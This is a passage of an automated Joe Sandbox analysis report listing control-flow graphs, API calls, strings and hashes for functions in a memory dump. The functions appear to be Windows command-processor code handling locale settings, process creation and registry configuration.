                                                                                                                    control_flow_graph 216 7ff789bcaa54-7ff789bcaa98 call 7ff789bccd90 219 7ff789bcaa9e 216->219 220 7ff789bdbf5a-7ff789bdbf70 call 7ff789bd4c1c call 7ff789bcff70 216->220 221 7ff789bcaaa5-7ff789bcaaa8 219->221 223 7ff789bcacde-7ff789bcad00 221->223 224 7ff789bcaaae-7ff789bcaac8 wcschr 221->224 229 7ff789bcad06 223->229 224->223 226 7ff789bcaace-7ff789bcaae9 towlower 224->226 226->223 228 7ff789bcaaef-7ff789bcaaf3 226->228 231 7ff789bdbeb7-7ff789bdbec4 call 7ff789beeaf0 228->231 232 7ff789bcaaf9-7ff789bcaafd 228->232 233 7ff789bcad0d-7ff789bcad1f 229->233 243 7ff789bdbf43-7ff789bdbf59 call 7ff789bd4c1c 231->243 244 7ff789bdbec6-7ff789bdbed8 call 7ff789bc3240 231->244 235 7ff789bcab03-7ff789bcab07 232->235 236 7ff789bdbbcf 232->236 237 7ff789bcad22-7ff789bcad2a call 7ff789bd13e0 233->237 239 7ff789bcab7d-7ff789bcab81 235->239 240 7ff789bcab09-7ff789bcab0d 235->240 245 7ff789bdbbde 236->245 237->221 246 7ff789bdbe63 239->246 247 7ff789bcab87-7ff789bcab95 239->247 240->246 248 7ff789bcab13-7ff789bcab17 240->248 243->220 244->243 261 7ff789bdbeda-7ff789bdbee9 call 7ff789bc3240 244->261 256 7ff789bdbbea-7ff789bdbbec 245->256 259 7ff789bdbe72-7ff789bdbe88 call 7ff789bc3278 call 7ff789bd4c1c 246->259 252 7ff789bcab98-7ff789bcaba0 247->252 248->239 253 7ff789bcab19-7ff789bcab1d 248->253 252->252 257 7ff789bcaba2-7ff789bcabb3 call 7ff789bccd90 252->257 253->245 258 7ff789bcab23-7ff789bcab27 253->258 266 7ff789bdbbf8-7ff789bdbc01 256->266 257->220 272 7ff789bcabb9-7ff789bcabde call 7ff789bd13e0 call 7ff789bd33a8 257->272 258->256 263 7ff789bcab2d-7ff789bcab31 258->263 281 7ff789bdbe89-7ff789bdbe8c 259->281 276 7ff789bdbef3-7ff789bdbef9 261->276 277 7ff789bdbeeb-7ff789bdbef1 261->277 263->229 268 7ff789bcab37-7ff789bcab3b 263->268 266->233 268->266 269 7ff789bcab41-7ff789bcab45 268->269 273 7ff789bdbc06-7ff789bdbc2a call 7ff789bd13e0 269->273 274 7ff789bcab4b-7ff789bcab4f 269->274 305 7ff789bcabe4-7ff789bcabe7 272->305 306 7ff789bcac75 272->306 298 7ff789bdbc2c-7ff789bdbc4c _wcsnicmp 273->298 299 7ff789bdbc5a-7ff789bdbc61 273->299 279 7ff789bcab55-7ff789bcab78 call 7ff789bd13e0 274->279 280 7ff789bcad2f-7ff789bcad33 274->280 276->243 282 7ff789bdbefb-7ff789bdbf0d call 7ff789bc3240 276->282 277->243 277->276 279->221 290 7ff789bdbc66-7ff789bdbc8a call 7ff789bd13e0 280->290 291 7ff789bcad39-7ff789bcad3d 280->291 286 7ff789bdbe92-7ff789bdbeaa call 7ff789bc3278 call 7ff789bd4c1c 281->286 287 7ff789bcacbe 281->287 282->243 312 7ff789bdbf0f-7ff789bdbf21 call 7ff789bc3240 282->312 340 7ff789bdbeab-7ff789bdbeb6 call 7ff789bd4c1c 286->340 295 7ff789bcacc0-7ff789bcacc7 287->295 319 7ff789bdbcc4-7ff789bdbcdc 290->319 320 7ff789bdbc8c-7ff789bdbcaa _wcsnicmp 290->320 300 7ff789bcad43-7ff789bcad49 291->300 301 7ff789bdbcde-7ff789bdbd02 call 7ff789bd13e0 291->301 295->295 309 7ff789bcacc9-7ff789bcacda 295->309 298->299 313 7ff789bdbc4e-7ff789bdbc55 298->313 307 7ff789bdbd31-7ff789bdbd4f _wcsnicmp 299->307 303 7ff789bcad4f-7ff789bcad68 300->303 304 7ff789bdbd5e-7ff789bdbd65 300->304 329 7ff789bdbd04-7ff789bdbd24 _wcsnicmp 301->329 330 7ff789bdbd2a 301->330 316 7ff789bcad6d-7ff789bcad70 303->316 317 7ff789bcad6a 303->317 304->303 314 7ff789bdbd6b-7ff789bdbd73 304->314 305->287 318 7ff789bcabed-7ff789bcac0b call 7ff789bccd90 * 2 305->318 323 7ff789bcac77-7ff789bcac7f 306->323 325 7ff789bdbd55 307->325 326 7ff789bdbbc2-7ff789bdbbca 307->326 309->223 312->243 343 7ff789bdbf23-7ff789bdbf35 call 7ff789bc3240 312->343 315 7ff789bdbbb3-7ff789bdbbb7 313->315 331 7ff789bdbe4a-7ff789bdbe5e 314->331 332 7ff789bdbd79-7ff789bdbd8b iswxdigit 314->332 333 7ff789bdbbba-7ff789bdbbbd call 7ff789bd13e0 315->333 316->237 317->316 318->340 358 7ff789bcac11-7ff789bcac14 318->358 319->307 320->319 327 7ff789bdbcac-7ff789bdbcbf 320->327 323->287 335 7ff789bcac81-7ff789bcac85 323->335 325->304 326->221 327->315 329->330 341 7ff789bdbbac 329->341 330->307 331->333 332->331 337 7ff789bdbd91-7ff789bdbda3 iswxdigit 332->337 333->326 342 7ff789bcac88-7ff789bcac8f 335->342 337->331 345 7ff789bdbda9-7ff789bdbdbb iswxdigit 337->345 340->231 341->315 342->342 347 7ff789bcac91-7ff789bcac94 342->347 343->243 355 7ff789bdbf37-7ff789bdbf3e call 7ff789bc3240 343->355 345->331 351 7ff789bdbdc1-7ff789bdbdd7 iswdigit 345->351 347->287 349 7ff789bcac96-7ff789bcacaa wcsrchr 347->349 349->287 354 7ff789bcacac-7ff789bcacb9 call 7ff789bd1300 349->354 356 7ff789bdbddf-7ff789bdbdeb towlower 351->356 357 7ff789bdbdd9-7ff789bdbddd 351->357 354->287 355->243 361 7ff789bdbdee-7ff789bdbe0f iswdigit 356->361 357->361 358->340 362 7ff789bcac1a-7ff789bcac33 memset 358->362 363 7ff789bdbe11-7ff789bdbe15 361->363 364 7ff789bdbe17-7ff789bdbe23 towlower 361->364 362->306 365 7ff789bcac35-7ff789bcac4b wcschr 362->365 366 7ff789bdbe26-7ff789bdbe45 call 7ff789bd13e0 363->366 364->366 365->306 367 7ff789bcac4d-7ff789bcac54 365->367 366->331 368 7ff789bcad72-7ff789bcad91 wcschr 367->368 369 7ff789bcac5a-7ff789bcac6f wcschr 367->369 371 7ff789bcaf03-7ff789bcaf07 368->371 372 7ff789bcad97-7ff789bcadac wcschr 368->372 369->306 369->368 371->306 372->371 373 7ff789bcadb2-7ff789bcadc7 wcschr 372->373 373->371 374 7ff789bcadcd-7ff789bcade2 wcschr 373->374 374->371 375 7ff789bcade8-7ff789bcadfd wcschr 374->375 375->371 376 7ff789bcae03-7ff789bcae18 wcschr 375->376 376->371 377 7ff789bcae1e-7ff789bcae21 376->377 378 7ff789bcae24-7ff789bcae27 377->378 378->371 379 7ff789bcae2d-7ff789bcae40 iswspace 378->379 380 7ff789bcae42-7ff789bcae49 379->380 381 7ff789bcae4b-7ff789bcae5e 379->381 380->378 382 7ff789bcae66-7ff789bcae6d 381->382 382->382 383 7ff789bcae6f-7ff789bcae77 382->383 383->259 384 7ff789bcae7d-7ff789bcae97 call 7ff789bd13e0 383->384 387 7ff789bcae9a-7ff789bcaea4 384->387 388 7ff789bcaea6-7ff789bcaead 387->388 389 7ff789bcaebc-7ff789bcaef8 call 7ff789bd0a6c call 7ff789bcff70 * 2 387->389 388->389 390 7ff789bcaeaf-7ff789bcaeba 388->390 389->323 397 7ff789bcaefe 389->397 390->387 390->389 397->281
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcschr$Heap$AllocateProcessiswspacememsettowlowerwcsrchr
                                                                                                                    • String ID: :$:$:$:ON$OFF
                                                                                                                    • API String ID: 4076514806-467788257
                                                                                                                    • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                                    • Instruction ID: 4969cf3e28070cadd62036cb1f5d724d4f6e4ec7f615cebaf54532959e42d219
                                                                                                                    • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                                    • Instruction Fuzzy Hash: 9122A321A0865B86EB64BF259514279EEB1FF85F97FE88135CA0E47794EF3CA440C360
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD51EC Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 384COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 398 7ff789bd51ec-7ff789bd5248 call 7ff789bd5508 GetLocaleInfoW 401 7ff789bdef32-7ff789bdef3c 398->401 402 7ff789bd524e-7ff789bd5272 GetLocaleInfoW 398->402 403 7ff789bdef3f-7ff789bdef49 401->403 404 7ff789bd5274-7ff789bd527a 402->404 405 7ff789bd5295-7ff789bd52b9 GetLocaleInfoW 402->405 406 7ff789bdef61-7ff789bdef6c 403->406 407 7ff789bdef4b-7ff789bdef52 403->407 408 7ff789bd5280-7ff789bd5286 404->408 409 7ff789bd54f7-7ff789bd54f9 404->409 410 7ff789bd52bb-7ff789bd52c3 405->410 411 7ff789bd52de-7ff789bd5305 GetLocaleInfoW 405->411 414 7ff789bdef75-7ff789bdef78 406->414 407->406 412 7ff789bdef54-7ff789bdef5f 407->412 408->409 413 7ff789bd528c-7ff789bd528f 408->413 409->401 410->414 415 7ff789bd52c9-7ff789bd52d7 410->415 416 7ff789bd5321-7ff789bd5343 GetLocaleInfoW 411->416 417 7ff789bd5307-7ff789bd531b 411->417 412->403 412->406 413->405 420 7ff789bdef7a-7ff789bdef7d 414->420 421 7ff789bdef99-7ff789bdefa3 414->421 415->411 418 7ff789bdefaf-7ff789bdefb9 416->418 419 7ff789bd5349-7ff789bd536e GetLocaleInfoW 416->419 417->416 425 7ff789bdefbc-7ff789bdefc6 418->425 422 7ff789bd5374-7ff789bd5396 GetLocaleInfoW 419->422 423 7ff789bdeff2-7ff789bdeffc 419->423 420->411 424 7ff789bdef83-7ff789bdef8d 420->424 421->418 427 7ff789bdf035-7ff789bdf03f 422->427 428 7ff789bd539c-7ff789bd53be GetLocaleInfoW 422->428 426 7ff789bdefff-7ff789bdf009 423->426 424->421 429 7ff789bdefde-7ff789bdefe9 425->429 430 7ff789bdefc8-7ff789bdefcf 425->430 431 7ff789bdf021-7ff789bdf02c 426->431 432 7ff789bdf00b-7ff789bdf012 426->432 435 7ff789bdf042-7ff789bdf04c 427->435 433 7ff789bd53c4-7ff789bd53e6 GetLocaleInfoW 428->433 434 7ff789bdf078-7ff789bdf082 428->434 429->423 430->429 436 7ff789bdefd1-7ff789bdefdc 430->436 431->427 432->431 437 7ff789bdf014-7ff789bdf01f 432->437 438 7ff789bdf0bb-7ff789bdf0c5 433->438 439 7ff789bd53ec-7ff789bd540e GetLocaleInfoW 433->439 442 7ff789bdf085-7ff789bdf08f 434->442 440 7ff789bdf064-7ff789bdf06f 435->440 441 7ff789bdf04e-7ff789bdf055 435->441 436->425 436->429 437->426 437->431 443 7ff789bdf0c8-7ff789bdf0d2 438->443 444 7ff789bd5414-7ff789bd5436 GetLocaleInfoW 439->444 445 7ff789bdf0fe-7ff789bdf108 439->445 440->434 441->440 446 7ff789bdf057-7ff789bdf062 441->446 447 7ff789bdf091-7ff789bdf098 442->447 448 7ff789bdf0a7-7ff789bdf0b2 442->448 450 7ff789bdf0d4-7ff789bdf0db 443->450 451 7ff789bdf0ea-7ff789bdf0f5 443->451 452 7ff789bdf141-7ff789bdf14b 444->452 453 7ff789bd543c-7ff789bd545e GetLocaleInfoW 444->453 454 7ff789bdf10b-7ff789bdf115 445->454 446->435 446->440 447->448 449 7ff789bdf09a-7ff789bdf0a5 447->449 448->438 449->442 449->448 450->451 456 7ff789bdf0dd-7ff789bdf0e8 450->456 451->445 455 7ff789bdf14e-7ff789bdf158 452->455 457 7ff789bdf184-7ff789bdf18b 453->457 458 7ff789bd5464-7ff789bd5486 GetLocaleInfoW 453->458 459 7ff789bdf12d-7ff789bdf138 454->459 460 7ff789bdf117-7ff789bdf11e 454->460 461 7ff789bdf170-7ff789bdf17b 455->461 462 7ff789bdf15a-7ff789bdf161 455->462 456->443 456->451 463 7ff789bdf18e-7ff789bdf198 457->463 464 7ff789bdf1c4-7ff789bdf1ce 458->464 465 7ff789bd548c-7ff789bd54ae GetLocaleInfoW 458->465 459->452 460->459 466 7ff789bdf120-7ff789bdf12b 460->466 461->457 462->461 467 7ff789bdf163-7ff789bdf16e 462->467 468 7ff789bdf1b0-7ff789bdf1bb 463->468 469 7ff789bdf19a-7ff789bdf1a1 463->469 472 7ff789bdf1d1-7ff789bdf1db 464->472 470 7ff789bd54b4-7ff789bd54f5 setlocale call 7ff789bd8f80 465->470 471 7ff789bdf207-7ff789bdf20e 465->471 466->454 466->459 467->455 467->461 468->464 469->468 474 7ff789bdf1a3-7ff789bdf1ae 469->474 473 7ff789bdf211-7ff789bdf21b 471->473 476 7ff789bdf1f3-7ff789bdf1fe 472->476 477 7ff789bdf1dd-7ff789bdf1e4 472->477 478 7ff789bdf233-7ff789bdf23e 473->478 479 7ff789bdf21d-7ff789bdf224 473->479 474->463 474->468 476->471 477->476 481 7ff789bdf1e6-7ff789bdf1f1 477->481 479->478 482 7ff789bdf226-7ff789bdf231 479->482 481->472 481->476 482->473 482->478
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLocale$DefaultLangUsersetlocale
                                                                                                                    • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                                                    • API String ID: 2492766124-2236139042
                                                                                                                    • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                                    • Instruction ID: ae2202a0480b99ed464ef0b5070acc91f0aabaf930c9c4a830528453e193ca86
                                                                                                                    • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                                    • Instruction Fuzzy Hash: BCF16C61B1874A85EF21AF25E9182B9AAB4BF45F82FE44136CA0D47794EF3CE505C360
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD4224 Relevance: 45.8, APIs: 19, Strings: 7, Instructions: 328threadprocessstringCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 483 7ff789bd4224-7ff789bd42a5 InitializeProcThreadAttributeList 484 7ff789bdecd4-7ff789bdecee GetLastError call 7ff789be9eec 483->484 485 7ff789bd42ab-7ff789bd42e5 UpdateProcThreadAttribute 483->485 493 7ff789bded1e 484->493 487 7ff789bdecf0-7ff789bded19 GetLastError call 7ff789be9eec DeleteProcThreadAttributeList 485->487 488 7ff789bd42eb-7ff789bd43c6 memset * 2 GetStartupInfoW call 7ff789bd3a90 call 7ff789bcb900 485->488 487->493 497 7ff789bd43cc-7ff789bd43d3 488->497 498 7ff789bd4638-7ff789bd4644 _local_unwind 488->498 499 7ff789bd4649-7ff789bd4650 497->499 500 7ff789bd43d9-7ff789bd43dc 497->500 498->499 499->500 503 7ff789bd4656-7ff789bd465d 499->503 501 7ff789bd4415-7ff789bd4424 call 7ff789bd5a68 500->501 502 7ff789bd43de-7ff789bd43f5 wcsrchr 500->502 510 7ff789bd4589-7ff789bd4590 501->510 511 7ff789bd442a-7ff789bd4486 CreateProcessW 501->511 502->501 504 7ff789bd43f7-7ff789bd440f lstrcmpW 502->504 503->501 506 7ff789bd4663 503->506 504->501 507 7ff789bd4668-7ff789bd466d call 7ff789be9044 504->507 506->500 507->501 510->511 512 7ff789bd4596-7ff789bd45fa CreateProcessAsUserW 510->512 514 7ff789bd448b-7ff789bd448f 511->514 512->514 515 7ff789bd4495-7ff789bd44c7 CloseHandle call 7ff789bd498c 514->515 516 7ff789bd4672-7ff789bd4682 GetLastError 514->516 519 7ff789bd468d-7ff789bd4694 515->519 520 7ff789bd44cd-7ff789bd44e5 515->520 516->519 521 7ff789bd4696-7ff789bd46a0 519->521 522 7ff789bd46a2-7ff789bd46ac 519->522 523 7ff789bd47a3-7ff789bd47a9 520->523 524 7ff789bd44eb-7ff789bd44f2 520->524 521->522 525 7ff789bd46ae-7ff789bd46b5 call 7ff789bd97bc 521->525 522->525 526 7ff789bd4705-7ff789bd4707 522->526 527 7ff789bd45ff-7ff789bd4607 524->527 528 7ff789bd44f8-7ff789bd4507 524->528 540 7ff789bd4703 525->540 541 7ff789bd46b7-7ff789bd4701 call 7ff789c1c038 525->541 526->520 530 7ff789bd470d-7ff789bd472a call 7ff789bccd90 526->530 527->528 531 7ff789bd460d 527->531 532 7ff789bd4612-7ff789bd4616 528->532 533 7ff789bd450d-7ff789bd4553 call 7ff789bd5cb4 call 7ff789bd33f0 call 7ff789bd498c 528->533 548 7ff789bd472c-7ff789bd4738 _local_unwind 530->548 549 7ff789bd473d-7ff789bd4767 call 7ff789bd13e0 call 7ff789be9eec call 7ff789bcff70 _local_unwind 530->549 536 7ff789bd476c-7ff789bd4773 531->536 538 7ff789bd461c-7ff789bd4633 532->538 539 7ff789bd47d7-7ff789bd47df 532->539 565 7ff789bd4558-7ff789bd455e 533->565 536->528 546 7ff789bd4779-7ff789bd4780 536->546 544 7ff789bd47f2-7ff789bd483c call 7ff789bcff70 DeleteProcThreadAttributeList call 7ff789bd8f80 538->544 543 7ff789bd47e1-7ff789bd47ed CloseHandle 539->543 539->544 540->526 541->526 543->544 546->528 552 7ff789bd4786-7ff789bd4789 546->552 548->549 549->536 552->528 558 7ff789bd478f-7ff789bd4792 552->558 558->523 562 7ff789bd4794-7ff789bd479d call 7ff789bea250 558->562 562->523 562->528 568 7ff789bd4564-7ff789bd4579 call 7ff789bd498c 565->568 569 7ff789bd47ae-7ff789bd47ca call 7ff789bd33f0 565->569 568->544 576 7ff789bd457f-7ff789bd4584 call 7ff789bea920 568->576 569->539 576->544
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                                                                                    • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                                                                                                    • API String ID: 388421343-2905461000
                                                                                                                    • Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                                                    • Instruction ID: b4e903eed802f40e9525ce57264badc599e2c24fa786fcd63b5b36c69964f04a
                                                                                                                    • Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                                                    • Instruction Fuzzy Hash: BEF14131A09B8A86EA60AF11E4487B9FBB5FB85F92FA44135D94D43794DF3CE444CB20
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD5554 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 295registryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 579 7ff789bd5554-7ff789bd55b9 call 7ff789bda640 582 7ff789bd55bc-7ff789bd55e8 RegOpenKeyExW 579->582 583 7ff789bd55ee-7ff789bd5631 RegQueryValueExW 582->583 584 7ff789bd5887-7ff789bd588e 582->584 585 7ff789bdf248-7ff789bdf24d 583->585 586 7ff789bd5637-7ff789bd5675 RegQueryValueExW 583->586 584->582 587 7ff789bd5894-7ff789bd58db time srand call 7ff789bd8f80 584->587 591 7ff789bdf260-7ff789bdf265 585->591 592 7ff789bdf24f-7ff789bdf25b 585->592 588 7ff789bd568e-7ff789bd56cc RegQueryValueExW 586->588 589 7ff789bd5677-7ff789bd567c 586->589 596 7ff789bdf2b6-7ff789bdf2bb 588->596 597 7ff789bd56d2-7ff789bd5710 RegQueryValueExW 588->597 594 7ff789bd5682-7ff789bd5687 589->594 595 7ff789bdf28b-7ff789bdf290 589->595 591->586 593 7ff789bdf26b-7ff789bdf286 _wtol 591->593 592->586 593->586 594->588 595->588 599 7ff789bdf296-7ff789bdf2b1 _wtol 595->599 600 7ff789bdf2ce-7ff789bdf2d3 596->600 601 7ff789bdf2bd-7ff789bdf2c9 596->601 602 7ff789bd5712-7ff789bd5717 597->602 603 7ff789bd5729-7ff789bd5767 RegQueryValueExW 597->603 599->588 600->597 604 7ff789bdf2d9-7ff789bdf2f4 _wtol 600->604 601->597 605 7ff789bd571d-7ff789bd5722 602->605 606 7ff789bdf2f9-7ff789bdf2fe 602->606 607 7ff789bd579f-7ff789bd57dd RegQueryValueExW 603->607 608 7ff789bd5769-7ff789bd576e 603->608 604->597 605->603 606->603 611 7ff789bdf304-7ff789bdf31a wcstol 606->611 609 7ff789bd57e3-7ff789bd57e8 607->609 610 7ff789bdf3a9 607->610 612 7ff789bd5774-7ff789bd578f 608->612 613 7ff789bdf320-7ff789bdf325 608->613 616 7ff789bdf363-7ff789bdf368 609->616 617 7ff789bd57ee-7ff789bd5809 609->617 624 7ff789bdf3b5-7ff789bdf3b8 610->624 611->613 614 7ff789bd5795-7ff789bd5799 612->614 615 7ff789bdf357-7ff789bdf35e 612->615 618 7ff789bdf34b 613->618 619 7ff789bdf327-7ff789bdf33f wcstol 613->619 614->607 614->615 615->607 620 7ff789bdf38e 616->620 621 7ff789bdf36a-7ff789bdf382 wcstol 616->621 622 7ff789bd580f-7ff789bd5813 617->622 623 7ff789bdf39a-7ff789bdf39d 617->623 618->615 619->618 620->623 621->620 622->623 625 7ff789bd5819-7ff789bd5823 622->625 623->610 626 7ff789bd582c 624->626 627 7ff789bdf3be-7ff789bdf3c5 624->627 625->624 628 7ff789bd5829 625->628 629 7ff789bd5832-7ff789bd5870 RegQueryValueExW 626->629 630 7ff789bdf3ca-7ff789bdf3d1 626->630 627->629 628->626 631 7ff789bd5876-7ff789bd5882 RegCloseKey 629->631 632 7ff789bdf3dd-7ff789bdf3e2 629->632 630->632 631->584 633 7ff789bdf3e4-7ff789bdf412 ExpandEnvironmentStringsW 632->633 634 7ff789bdf433-7ff789bdf439 632->634 635 7ff789bdf414-7ff789bdf426 call 7ff789bd13e0 633->635 636 7ff789bdf428 633->636 634->631 637 7ff789bdf43f-7ff789bdf44c call 7ff789bcb900 634->637 639 7ff789bdf42e 635->639 636->639 637->631 639->634
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: QueryValue$CloseOpensrandtime
                                                                                                                    • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                                                    • API String ID: 145004033-3846321370
                                                                                                                    • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                                    • Instruction ID: 80abdf1a29dad377d8dae6f07b4cd7864bf9554a47194cd5cc6fd5bbaefcd3e6
                                                                                                                    • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                                    • Instruction Fuzzy Hash: B2E1953252DA8AC6E750AF10E45457AFBB0FB89B52FE05135E68E02A58EF7CD544CB20
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD37D8 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 269registrythreadmemoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
